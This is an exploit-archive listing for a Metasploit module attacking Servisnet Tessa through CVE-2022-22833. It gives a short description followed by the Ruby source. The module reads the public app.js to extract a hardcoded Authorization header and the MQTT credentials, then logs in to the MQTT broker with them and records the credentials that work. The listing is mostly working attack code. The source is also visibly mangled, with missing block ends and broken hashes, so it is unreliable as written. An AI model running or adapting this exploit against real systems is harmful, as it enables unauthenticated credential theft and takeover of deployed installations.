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Servisnet Tessa MQTT Credential Disclosure

Servisnet Tessa MQTT Credential Disclosure
Posted Feb 4, 2022
Authored by AkkuS | Site metasploit.com

This Metasploit module exploits an MQTT credential disclosure vulnerability in Servisnet Tessa. The app.js is publicly available which acts as the backend of the application. By exposing a default value for the "Authorization" HTTP header, it is possible to make unauthenticated requests to some areas of the application. Even MQTT (Message Queuing Telemetry Transport) protocol connection information can be obtained with this method. A new admin user can be added to the database with this header obtained in the source code. The module tries to log in to the MQTT service with the credentials it has obtained and reflects the response it receives from the service.

tags | exploit, web, protocol, info disclosure
advisories | CVE-2022-22833
SHA-256 | a526a71a842e124933fbe29b7fe054817479987a1ba9b99072a7022c4655f1ae

Servisnet Tessa MQTT Credential Disclosure

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# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/mqtt'

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::MQTT
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
'Name' => 'Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)',
'Description' => %q(
This module exploits MQTT creds dump vulnerability in Servisnet Tessa.
The app.js is publicly available which acts as the backend of the application.
By exposing a default value for the "Authorization" HTTP header,
it is possible to make unauthenticated requests to some areas of the application.
Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
A new admin user can be added to the database with this header obtained in the source code.

The module tries to log in to the MQTT service with the credentials it has obtained,
and reflects the response it receives from the service.

'References' =>
[ 'CVE', 'CVE-2022-22833' ],
[ 'URL', 'https://pentest.com.tr/exploits/Servisnet-Tessa-MQTT-Credentials-Dump-Unauthenticated.html' ],
[ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
'Author' =>
'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
'License' => MSF_LICENSE,
'DisclosureDate' => "Dec 22 2021",
'DefaultOptions' =>
'RPORT' => 443,
'SSL' => true

OptString.new('TARGETURI', [true, 'Base path for application', '/'])
# split strings to salt
def split(data, string_to_split)
word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
string = word.split('"]').join('').split('["').join('')
return string

def check_mqtt
res = send_request_cgi({
# default.a.get( check
'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
'method' => 'GET'

if res && res.code == 200 && res.body =~ /connectionMQTT/
data = res.body
#word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
mqtt_host = data.scan(/host: '([\S\s]*?)'/)[0][0]
rhost = mqtt_host.split('mqtts://').join('')
print_status("MQTT Host: #{mqtt_host}")
mqtt_port = data.scan(/port: ([\S\s]*?),/)[0][0]
print_status("MQTT Port: #{mqtt_port}")
mqtt_end = data.scan(/endpoint: '([\S\s]*?)'/)[0][0]
print_status("MQTT Endpoint: #{mqtt_end}")
mqtt_cl = data.scan(/clientId: '([\S\s]*?)'/)[0][0]
print_status("MQTT clientId: #{mqtt_cl}")
mqtt_usr = data.scan(/username: '([\S\s]*?)'/)[1][0]
print_status("MQTT username: #{mqtt_usr}")
mqtt_pass = data.scan(/password: '([\S\s]*?)'/)[1][0]
print_status("MQTT password: #{mqtt_pass}")

print_status("##### Starting MQTT login sweep #####")

# Removed brute force materials that can be included for the collection.
cred_collection = Metasploit::Framework::CredentialCollection.new(
password: mqtt_pass,
username: mqtt_usr
# this definition already exists in "auxiliary/scanner/mqtt/connect". Moved into exploit.
cred_collection = prepend_db_passwords(cred_collection)

scanner = Metasploit::Framework::LoginScanner::MQTT.new(
host: rhost,
port: mqtt_port,
read_timeout: datastore['READ_TIMEOUT'],
client_id: client_id,
proxies: datastore['PROXIES'],
cred_details: cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: datastore['ConnectTimeout'],
max_send_size: datastore['TCP::max_send_size'],
send_delay: datastore['TCP::send_delay'],
framework: framework,
framework_module: self,
ssl: datastore['SSL'],
ssl_version: datastore['SSLVersion'],
ssl_verify_mode: datastore['SSLVerifyMode'],
ssl_cipher: datastore['SSLCipher'],
local_port: datastore['CPORT'],
local_host: datastore['CHOST']

scanner.scan! do |result|
credential_data = result.to_h
module_fullname: fullname,
workspace_id: myworkspace_id
password = result.credential.private
username = result.credential.public
if result.success?
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
print_good("MQTT Login Successful: #{username}/#{password}")
vprint_error("MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})")

def auth_bypass
res = send_request_cgi({
# default.a.defaults.headers.post["Authorization"] check
'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
'method' => 'GET'

if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
token = split(res.body, 'Authorization')
print_status("Authorization: #{token}")
return token
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')

def check
if auth_bypass =~ /Basic/
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Safe

def run
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')

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